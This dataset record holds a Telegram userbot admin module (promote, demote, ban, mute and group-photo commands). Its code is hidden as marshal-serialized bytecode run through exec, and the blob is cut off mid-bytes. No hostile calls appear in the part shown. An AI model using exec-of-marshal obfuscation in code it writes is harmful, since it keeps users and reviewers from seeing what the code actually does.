| 0.108696
| 0.036303
| 0.04
| 0.049412
| 0.834398
| 0.805154
| 0.764818
| 0.738824
| 0.727507
| 0.682577
| 0
| 0.007616
| 0.219664
| 13,293
| 271
| 186
| 49.051661
| 0.852791
| 0.378019
| 0
| 0.387755
| 0
| 0.020408
| 0.2318
| 0
| 0
| 0
| 0
| 0
| 0.173469
| 1
| 0.204082
| false
| 0.377551
| 0.040816
| 0
| 0.295918
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
203d3fa99634362921ef4101bc4c8522e24f6faf
| 59,630
|
py
|
Python
|
userbot/modules/admin.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/admin.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/admin.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#Encript Marshal By XVenom
#https://github.com/xvenom15
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00@\x00\x00\x00s\x84\x03\x00\x00d\x00Z\x00d\x01d\x02l\x01m\x02Z\x02\x01\x00d\x01d\x03l\x03m\x04Z\x04\x01\x00d\x01d\x04l\x01Z\x01d\x01d\x04l\x05Z\x05d\x01d\x04l\x06Z\x06d\x01d\x04l\x07Z\x07d\x01d\x04l\x08Z\x08d\x01d\x04l\tm\n\x02\x00\x01\x00m\x0b\x02\x00\x01\x00m\x0cZ\r\x01\x00d\x01d\x05l\x0em\x0fZ\x0fm\x10Z\x10\x01\x00d\x01d\x06l\x11m\x12Z\x12\x01\x00d\x01d\x07l\x13m\x14Z\x14m\x15Z\x15m\x16Z\x16m\x17Z\x17m\x18Z\x18\x01\x00d\x01d\x08l\x19m\x1aZ\x1am\x1bZ\x1b\x01\x00d\x01d\tl\x1cm\x1dZ\x1dm\x1eZ\x1em\x1fZ\x1f\x01\x00d\x01d\nl m!Z!\x01\x00d\x01d\x0bl"m#Z#m$Z$m%Z%m&Z&m\'Z\'m(Z(m)Z)\x01\x00d\x01d\x0cl*m+Z+m,Z,m-Z-m.Z.\x01\x00d\x01d\rl/m0Z0m1Z1\x01\x00d\x01d\x0el2m3Z3\x01\x00d\x0fZ4d\x10Z5d\x11Z6d\x12Z7d\x13Z8d\x14Z9d\x15Z:d\x16Z;e&d\x04d\x17d\x17d\x17d\x17d\x17d\x17d\x17d\x17d\x18\x8d\tZ<e&d\x04d\x04d\x04d\x04d\x04d\x04d\x04d\x04d\x19\x8d\x08Z=e&d\x04d\x17d\x1a\x8d\x02Z>e&d\x04d\x1bd\x1a\x8d\x02Z?e3d\x17d\x1cd\x1d\x8d\x02d\x1ed\x1f\x84\x00\x83\x01Z@e3d\x17d d\x1d\x8d\x02d!d"\x84\x00\x83\x01ZAe3d\x17d#d\x1d\x8d\x02d$d%\x84\x00\x83\x01ZBe3d\x17d&d\x1d\x8d\x02d\'d(\x84\x00\x83\x01ZCe3d\x17d)d\x1d\x8d\x02d*d+\x84\x00\x83\x01ZDe3d\x17d,d\x1d\x8d\x02d-d.\x84\x00\x83\x01ZEe3d\x17d/d\x1d\x8d\x02d0d1\x84\x00\x83\x01ZFe3d\x17d2\x8d\x01d3d4\x84\x00\x83\x01ZGe3d\x17d5d\x1d\x8d\x02d6d7\x84\x00\x83\x01ZHe3d\x17d8d\x1d\x8d\x02d9d:\x84\x00\x83\x01ZIe3d\x17d;d\x1bd<\x8d\x03d=d>\x84\x00\x83\x01ZJe3d\x17d?d\x1d\x8d\x02d@dA\x84\x00\x83\x01ZKe3d\x17dBd\x1d\x8d\x02dCdD\x84\x00\x83\x01ZLe3d\x17dEd\x1d\x8d\x02dFdG\x84\x00\x83\x01ZMe3d\x17dHd\x1d\x8d\x02dIdJ\x84\x00\x83\x01ZNdKdL\x84\x00ZOdMdN\x84\x00ZPe3d\x17dOd\x1d\x8d\x02dPdQ\x84\x00\x83\x01ZQdRdS\x84\x00ZRdTdU\x84\x00ZSe3d\x17dVd\x1d\x8d\x02dWdX\x84\x00\x83\x01ZTe3d\x17dYd\x1d\x8d\x02dZd[\x84\x00\x83\x01ZUe3d\x17d\\d\x1d\x8d\x02d]d^\x84\x00\x83\x01ZVe3d\x17d_d\x1d\x8d\x02d`d^\x84\x00\x83\x01ZVe3d\x17dad\x1d\x8d\x02dbdc\x84\x00\x83\x01ZWe3d\x17ddd\x1d\x8d\x02dedf\x84\x00\x83\x01ZXe3d\x17dgd\x1d\x8d\x02dhd^\x84\x00\x83\x01ZVe-\xa0Ydidji\x01\xa1\x01\x01\x00d\x04S\x00)kz+\nUserbot module to help you manage a group\n\xe9\x00\x00\x00\x00)\x01\xda\x05sleep)\x01\xda\x06removeN)\x02\xda\x06events\xda\x05utils)\x01\xda\x08is_admin)\x05\xda\x0fBadRequestError\xda\x16ChatAdminRequiredError\xda\x17ImageProcessFailedError\xda\x17PhotoCropSizeSmallError\xda\x15UserAdminInvalidError)\x02\xda\x12UserIdInvalidError\xda\x13MessageTooLongError)\x03\xda\x10EditAdminRequest\xda\x11EditBannedRequest\xda\x10EditPhotoRequest)\x01\xda\x1aUpdatePinnedMessageRequest)\x07\xda\x0bPeerChannel\xda\x19ChannelParticipantsAdmins\xda\x0fChatAdminRights\xda\x10ChatBannedRights\xda\x18MessageEntityMentionName\xda\x11MessageMediaPhoto\xda\x17ChannelParticipantsBots)\x04\xda\x06BOTLOG\xda\rBOTLOG_CHATID\xda\x08CMD_HELP\xda\x03bot)\x02\xda\x05types\xda\tfunctions)\x01\xda\x08registerz\x18`The image is too small`z$`Failure while processing the image`z\x14`I am not an admin!`z&`I don\'t have sufficient permissions!`z\x1a`Running on Non-SQL mode!`z\x16`Chat Picture Changed`z^`Some issue with updating the pic,``maybe coz I\'m not an admin,``or don\'t have enough rights.`z\x13`Invalid Extension`T)\t\xda\nuntil_date\xda\rview_messages\xda\rsend_messages\xda\nsend_media\xda\rsend_stickers\xda\tsend_gifs\xda\nsend_games\xda\x0bsend_inline\xda\x0bembed_links\xa9\x08r \x00\x00\x00r"\x00\x00\x00r#\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00r(\x00\x00\x00)\x02r \x00\x00\x00r"\x00\x00\x00Fz\n^.setgpic$)\x02\xda\x08outgoing\xda\x07patternc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\xc3\x00\x00\x00s\\\x01\x00\x00|\x00j\x00s\x1a|\x00\xa0\x01d\x01\xa1\x01I\x00d\x02H\x00\x01\x00d\x02S\x00|\x00\xa0\x02\xa1\x00I\x00d\x02H\x00}\x01|\x00\xa0\x03\xa1\x00I\x00d\x02H\x00}\x02|\x02j\x04}\x03|\x02j\x05}\x04d\x02}\x05|\x03sb|\x04sb|\x00\xa0\x01t\x06\xa1\x01I\x00d\x02H\x00\x01\x00d\x02S\x00|\x01r\xcc|\x01j\x07r\xcct\x08|\x01j\x07t\t\x83\x02r\x90|\x00j\nj\x0b|\x01j\x0cd\x03\x8d\x01I\x00d\x02H\x00}\x05n<d\x04|\x01j\x07j\rj\x0e\xa0\x0fd\x05\xa1\x01k\x06r\xbc|\x00j\n\xa0\x10|\x01j\x07j\r\xa1\x01I\x00d\x02H\x00}\x05n\x10|\x00\xa0\x01t\x11\xa1\x01I\x00d\x02H\x00\x01\x00|\x05\x90\x01rXz:|\x00\xa0\nt\x12|\x00j\x13|\x00j\n\xa0\x14|\x05\xa1\x01I\x00d\x02H\x00\x83\x02\xa1\x01I\x00d\x02H\x00\x01\x00|\x00\xa0\x01t\x15\xa1\x01I\x00d\x02H\x00\x01\x00W\x00nJ\x04\x00t\x16k\n\x90\x01r2\x01\x00\x01\x00\x01\x00|\x00\xa0\x01t\x17\xa1\x01I\x00d\x02H\x00\x01\x00Y\x00n&\x04\x00t\x18k\n\x90\x01rV\x01\x00\x01\x00\x01\x00|\x00\xa0\x01t\x19\xa1\x01I\x00d\x02H\x00\x01\x00Y\x00n\x02X\x00d\x02S\x00)\x06z6 For .setgpic command, changes the picture of a group z `I don\'t think this is a group.`N)\x01\xda\x07messageZ\x05image\xfa\x01/)\x1aZ\x08is_group\xda\x04edit\xda\x11get_reply_message\xda\x08get_chat\xda\x0cadmin_rights\xda\x07creator\xda\x08NO_ADMIN\xda\x05media\xda\nisinstancer\x17\x00\x00\x00\xda\x06clientZ\x0edownload_media\xda\x05photoZ\x08documentZ\tmime_type\xda\x05splitZ\rdownload_file\xda\rINVALID_MEDIAr\x10\x00\x00\x00\xda\x07chat_idZ\x0bupload_file\xda\x0fCHAT_PP_CHANGEDr\n\x00\x00\x00\xda\x0bPP_TOO_SMOLr\t\x00\x00\x00\xda\x08PP_ERROR)\x06Z\x04gpicZ\x08replymsg\xda\x04chat\xda\x05adminr2\x00\x00\x00r7\x00\x00\x00\xa9\x00r@\x00\x00\x00\xda\x00\xda\x0fset_group_photoQ\x00\x00\x00s:\x00\x00\x00\x00\x03\x06\x01\x10\x01\x04\x01\x0e\x01\x0e\x01\x06\x01\x06\x01\x04\x02\x08\x01\x10\x01\x04\x02\n\x01\x0c\x01\x18\x01\x14\x01\x18\x02\x10\x02\x06\x01\x02\x01\x04\x01\x06\x01\n\xff\x08\xff\n\x03\x14\x02\x10\x01\x14\x01\x10\x01rB\x00\x00\x00z\x14^.promote(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\x1a\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00t\x05d\x02d\x03d\x02d\x03d\x03d\x03d\x04\x8d\x06}\x04|\x00\xa0\x03d\x05\xa1\x01I\x00d\x01H\x00\x01\x00t\x06|\x00\x83\x01I\x00d\x01H\x00\\\x02}\x05}\x06|\x06std\x06}\x06|\x05rzn\x04d\x01S\x00z2|\x00\xa0\x07t\x08|\x00j\t|\x05j\n|\x04|\x06\x83\x04\xa1\x01I\x00d\x01H\x00\x01\x00|\x00\xa0\x03d\x07\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0bk\nr\xd6\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x0c\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00t\r\x90\x01r\x16|\x00j\x07\xa0\x0et\x0fd\x08|\x05j\x10\x9b\x00d\t|\x05j\n\x9b\x00d\n|\x00j\x11j\x12\x9b\x00d\x0b|\x00j\t\x9b\x00d\x0c\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\rz: For .promote command, promotes the replied/tagged person NFT\xa9\x06Z\nadd_admins\xda\x0cinvite_users\xda\x0bchange_infoZ\tban_usersZ\x0fdelete_messages\xda\x0cpin_messagesz\x0e`Promoting...`Z\rAdministratorz\x18`Promoted Successfully!`z\x10#PROMOTE\nUSER: [\xfa\x0f](tg://user?id=\xfa\x08)\nCHAT: \xfa\x02(`\xfa\x02`))\x13r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00r\x14\x00\x00\x00\xda\x13get_user_from_eventr6\x00\x00\x00r\x0e\x00\x00\x00r:\x00\x00\x00\xda\x02idr\x07\x00\x00\x00\xda\x07NO_PERMr\x19\x00\x00\x00\xda\x0csend_messager\x1a\x00\x00\x00\xda\nfirst_namer>\x00\x00\x00\xda\x05title)\x07Z\x05promtr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00Z\nnew_rights\xda\x04user\xda\x04rankr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x07promotev\x00\x00\x00sB\x00\x00\x00\x00\x04\x0e\x02\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xfb\x06\x07\x10\x01\x12\x01\x04\x01\x04\x01\x04\x01\x02\x02\x04\x03\x02\x01\x04\x01\x10\xff\n\x02\x14\x04\x0e\x01\x10\x01\x08\x03\x06\x01\x06\x01\x02\x00&\xffrS\x00\x00\x00z\x13^.demote(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\x1a\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00d\x03}\x04t\x05|\x00\x83\x01I\x00d\x01H\x00}\x05|\x05d\x04\x19\x00}\x05|\x05rfn\x04d\x01S\x00t\x06d\x01d\x01d\x01d\x01d\x01d\x01d\x05\x8d\x06}\x06z"|\x00\xa0\x07t\x08|\x00j\t|\x05j\n|\x06|\x04\x83\x04\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0bk\nr\xc6\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x0c\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00|\x00\xa0\x03d\x06\xa1\x01I\x00d\x01H\x00\x01\x00t\r\x90\x01r\x16|\x00j\x07\xa0\x0et\x0fd\x07|\x05j\x10\x9b\x00d\x08|\x05j\n\x9b\x00d\t|\x00j\x11j\x12\x9b\x00d\n|\x00j\t\x9b\x00d\x0b\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0cz8 For .demote command, demotes the replied/tagged person Nz\r`Demoting...`Z\x06admemer\x01\x00\x00\x00rC\x00\x00\x00z\x17`Demoted Successfully!`z\x0f#DEMOTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x13r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r\x14\x00\x00\x00r6\x00\x00\x00r\x0e\x00\x00\x00r:\x00\x00\x00rL\x00\x00\x00r\x07\x00\x00\x00rM\x00\x00\x00r\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\x07Z\x04dmodr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rR\x00\x00\x00rQ\x00\x00\x00Z\tnewrightsr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x06demote\xa8\x00\x00\x00sB\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x02\x08\x01\x10\x01\x04\x03\x10\x01\x04\x01\x0e\x01\x08\x01\x04\x01\x02\x02\x04\x03\x04\x01\x02\x01\x02\x01\x02\x01\x02\x01\x02\xfb\x06\x07\x02\x01\x04\x01\x10\xff\x0e\x05\x0e\x01\x10\x01\x08\x01\x10\x03\x06\x01\x06\x01\x02\x00&\xffrT\x00\x00\x00z\x10^.ban(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\x80\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00t\x05|\x00\x83\x01I\x00d\x01H\x00\\\x02}\x04}\x05|\x04rNn\x04d\x01S\x00|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00z |\x00\xa0\x06t\x07|\x00j\x08|\x04j\tt\n\x83\x03\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0bk\nr\xa8\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x0c\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00z$|\x00\xa0\r\xa1\x00I\x00d\x01H\x00}\x06|\x06r\xcc|\x06\xa0\x0e\xa1\x00I\x00d\x01H\x00\x01\x00W\x00n&\x04\x00t\x0bk\nr\xf4\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\x03\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00|\x05\x90\x01r |\x00\xa0\x03d\x04t\x0f|\x04j\t\x83\x01\x9b\x00d\x05|\x05\x9b\x00\x9d\x04\xa1\x01I\x00d\x01H\x00\x01\x00n\x1e|\x00\xa0\x03d\x04t\x0f|\x04j\t\x83\x01\x9b\x00d\x06\x9d\x03\xa1\x01I\x00d\x01H\x00\x01\x00t\x10\x90\x01r||\x00j\x06\xa0\x11t\x12d\x07|\x04j\x13\x9b\x00d\x08|\x04j\t\x9b\x00d\t|\x00j\x14j\x15\x9b\x00d\n|\x00j\x08\x9b\x00d\x0b\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0cz2 For .ban command, bans the replied/tagged person Nz\x14`Whacking the pest!`z=`I dont have message nuking rights! But still he was banned!`\xfa\x01`z\x18` Tergamparr !!\nReason: z\x18` Berhasil di Gamparr !!z\x0c#BAN\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x16r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r6\x00\x00\x00r\x0f\x00\x00\x00r:\x00\x00\x00rL\x00\x00\x00\xda\rBANNED_RIGHTSr\x07\x00\x00\x00rM\x00\x00\x00r/\x00\x00\x00\xda\x06delete\xda\x03strr\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\x07Z\x03bonr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rQ\x00\x00\x00\xda\x06reason\xda\x05replyr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x03ban\xd9\x00\x00\x00sF\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x12\x01\x04\x01\x02\x02\x04\x03\x10\x02\x02\x01\x0e\x01\x02\xff\x10\x02\x0e\x01\x10\x01\x08\x02\x02\x01\x0e\x01\x04\x01\x12\x01\x0e\x01\x04\x01\x02\xff\n\x02\x08\x04\x06\x01$\x02\x1e\x03\x06\x01\x06\x01\x02\x00&\xffr[\x00\x00\x00z\x12^.unban(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\xfc\x00\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00|\x00\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00\x01\x00t\x05|\x00\x83\x01I\x00d\x01H\x00}\x04|\x04d\x03\x19\x00}\x04|\x04rbn\x04d\x01S\x00zl|\x00\xa0\x06t\x07|\x00j\x08|\x04j\tt\n\x83\x03\xa1\x01I\x00d\x01H\x00\x01\x00|\x00\xa0\x03d\x04\xa1\x01I\x00d\x01H\x00\x01\x00t\x0br\xd0|\x00j\x06\xa0\x0ct\rd\x05|\x04j\x0e\x9b\x00d\x06|\x04j\t\x9b\x00d\x07|\x00j\x0fj\x10\x9b\x00d\x08|\x00j\x08\x9b\x00d\t\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00W\x00n$\x04\x00t\x11k\nr\xf6\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\n\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00n\x02X\x00d\x01S\x00)\x0bz6 For .unban command, unbans the replied/tagged person Nz\x0e`Unbanning...`r\x01\x00\x00\x00z\x1b```Unbanned Successfully```z\x0e#UNBAN\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00z\x1d`Uh oh my unban logic broke!`)\x12r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r6\x00\x00\x00r\x0f\x00\x00\x00r:\x00\x00\x00rL\x00\x00\x00\xda\x0cUNBAN_RIGHTSr\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r\x0c\x00\x00\x00)\x05Z\x05unbonr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rQ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x08nothanos\x0e\x01\x00\x00s0\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x03\x10\x02\x0e\x01\x08\x01\x04\x01\x02\x02\x04\x02\x02\x01\x04\x01\x0e\xff\n\x02\x10\x02\x04\x01\x06\x01\x02\x00&\xff\x0e\x04\x0e\x01r]\x00\x00\x00z\x11^.mute(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\xa4\x01\x00\x00z\x10d\x01d\x02l\x00m\x01}\x01\x01\x00W\x00n&\x04\x00t\x02k\nr6\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x04\xa1\x01I\x00d\x03H\x00\x01\x00Y\x00d\x03S\x00X\x00|\x00\xa0\x05\xa1\x00I\x00d\x03H\x00}\x02|\x02j\x06}\x03|\x02j\x07}\x04|\x03sn|\x04sn|\x00\xa0\x03t\x08\xa1\x01I\x00d\x03H\x00\x01\x00d\x03S\x00t\t|\x00\x83\x01I\x00d\x03H\x00\\\x02}\x05}\x06|\x05r\x86n\x04d\x03S\x00|\x00j\n\xa0\x0b\xa1\x00I\x00d\x03H\x00}\x07|\x05j\x0c|\x07j\x0ck\x02r\xba|\x00\xa0\x03d\x04\xa1\x01I\x00d\x03H\x00\x01\x00d\x03S\x00|\x00\xa0\x03d\x05\xa1\x01I\x00d\x03H\x00\x01\x00|\x01|\x00j\r|\x05j\x0c\x83\x02d\x06k\x08r\xec|\x00\xa0\x03d\x07\xa1\x01I\x00d\x03H\x00S\x00z\x8c|\x00\xa0\nt\x0e|\x00j\r|\x05j\x0ct\x0f\x83\x03\xa1\x01I\x00d\x03H\x00\x01\x00|\x06\x90\x01r(|\x00\xa0\x03d\x08|\x06\x9b\x00\x9d\x02\xa1\x01I\x00d\x03H\x00\x01\x00n\x10|\x00\xa0\x03d\t\xa1\x01I\x00d\x03H\x00\x01\x00t\x10\x90\x01rv|\x00j\n\xa0\x11t\x12d\n|\x05j\x13\x9b\x00d\x0b|\x05j\x0c\x9b\x00d\x0c|\x00j\x14j\x15\x9b\x00d\r|\x00j\r\x9b\x00d\x0e\x9d\t\xa1\x02I\x00d\x03H\x00\x01\x00W\x00n&\x04\x00t\x16k\n\x90\x01r\x9e\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\x0f\xa1\x01I\x00d\x03H\x00\x06\x00Y\x00S\x00X\x00d\x03S\x00)\x10z1\n This function is basically muting peeps\n r\x01\x00\x00\x00)\x01\xda\x04muteNuE\x00\x00\x00`Hands too short, can\'t duct tape myself...\n(\xe3\x83\x98\xef\xbd\xa5_\xef\xbd\xa5)\xe3\x83\x98\xe2\x94\xb3\xe2\x94\x81\xe2\x94\xb3`z\x0e`Gets a tape!`Fz%`Error! User probably already muted.`z\x1f`Berhasil di Emute !!`\nReason: z\x16`Berhasil di Emute !!`z\r#MUTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00z\x1c`Uh oh my mute logic broke!`)\x17\xda(userbot.modules.sql_helper.spam_mute_sqlr^\x00\x00\x00\xda\x0eAttributeErrorr.\x00\x00\x00\xda\x06NO_SQLr0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00r6\x00\x00\x00Z\x06get_merL\x00\x00\x00r:\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bMUTE_RIGHTSr\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00r\x0c\x00\x00\x00)\x08Z\x04spdrr^\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rQ\x00\x00\x00rY\x00\x00\x00Z\tself_userr@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x06spider3\x01\x00\x00sL\x00\x00\x00\x00\x06\x02\x01\x10\x01\x0e\x01\x10\x01\x08\x03\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x02\x12\x01\x04\x01\x02\x02\x04\x02\x10\x02\x0c\x01\x04\x01\x02\xff\n\x02\x04\x03\x10\x01\x12\x01\x10\x02\x02\x01\x04\x01\x0e\xff\n\x04\x06\x01\x18\x02\x10\x03\x06\x01\x06\x01\x02\x00&\xff\x0e\x04\x10\x01rc\x00\x00\x00z\x13^.unmute(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x0c\x00\x00\x00\xc3\x00\x00\x00s\\\x01\x00\x00|\x00\xa0\x00\xa1\x00I\x00d\x01H\x00}\x01|\x01j\x01}\x02|\x01j\x02}\x03|\x02s6|\x03s6|\x00\xa0\x03t\x04\xa1\x01I\x00d\x01H\x00\x01\x00d\x01S\x00z\x10d\x02d\x03l\x05m\x06}\x04\x01\x00W\x00n&\x04\x00t\x07k\nrl\x01\x00\x01\x00\x01\x00|\x00\xa0\x03t\x08\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00|\x00\xa0\x03d\x04\xa1\x01I\x00d\x01H\x00\x01\x00t\t|\x00\x83\x01I\x00d\x01H\x00}\x05|\x05d\x02\x19\x00}\x05|\x05r\x9an\x04d\x01S\x00|\x04|\x00j\n|\x05j\x0b\x83\x02d\x05k\x08r\xc0|\x00\xa0\x03d\x06\xa1\x01I\x00d\x01H\x00S\x00z0|\x00\xa0\x0ct\r|\x00j\n|\x05j\x0bt\x0e\x83\x03\xa1\x01I\x00d\x01H\x00\x01\x00|\x00\xa0\x03d\x07\xa1\x01I\x00d\x01H\x00\x01\x00W\x00n(\x04\x00t\x0fk\n\x90\x01r\x18\x01\x00\x01\x00\x01\x00|\x00\xa0\x03d\x08\xa1\x01I\x00d\x01H\x00\x01\x00Y\x00d\x01S\x00X\x00t\x10\x90\x01rX|\x00j\x0c\xa0\x11t\x12d\t|\x05j\x13\x9b\x00d\n|\x05j\x0b\x9b\x00d\x0b|\x00j\x14j\x15\x9b\x00d\x0c|\x00j\n\x9b\x00d\r\x9d\t\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x0ez7 For .unmute command, unmute the replied/tagged person Nr\x01\x00\x00\x00)\x01\xda\x06unmutez\x11```Unmuting...```Fz\'`Error! User probably already unmuted.`z\x1a```Unmuted Successfully```z\x1e`Uh oh my unmute logic broke!`z\x0f#UNMUTE\nUSER: [rG\x00\x00\x00rH\x00\x00\x00rI\x00\x00\x00rJ\x00\x00\x00)\x16r0\x00\x00\x00r1\x00\x00\x00r2\x00\x00\x00r.\x00\x00\x00r3\x00\x00\x00r_\x00\x00\x00rd\x00\x00\x00r`\x00\x00\x00ra\x00\x00\x00rK\x00\x00\x00r:\x00\x00\x00rL\x00\x00\x00r6\x00\x00\x00r\x0f\x00\x00\x00r\\\x00\x00\x00r\x0c\x00\x00\x00r\x19\x00\x00\x00rN\x00\x00\x00r\x1a\x00\x00\x00rO\x00\x00\x00r>\x00\x00\x00rP\x00\x00\x00)\x06Z\x05unmotr>\x00\x00\x00r?\x00\x00\x00r2\x00\x00\x00rd\x00\x00\x00rQ\x00\x00\x00r@\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x06unmooto\x01\x00\x00s@\x00\x00\x00\x00\x04\x0e\x01\x06\x01\x06\x03\x08\x01\x10\x01\x04\x03\x02\x01\x10\x01\x0e\x01\x10\x01\x08\x03\x10\x01\x0e\x01\x08\x01\x04\x01\x02\x02\x04\x02\x12\x01\x10\x03\x02\x01\x04\x01\x0e\xff\n\x02\x14\x01\x10\x01\x10\x01\x08\x02\x06\x01\x06\x01\x02\x00&\xffre\x00\x00\x00)\x01Z\x08incomingc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s\xd8\x00\x00\x00z\x1cd\x01d\x02l\x00m\x01}\x0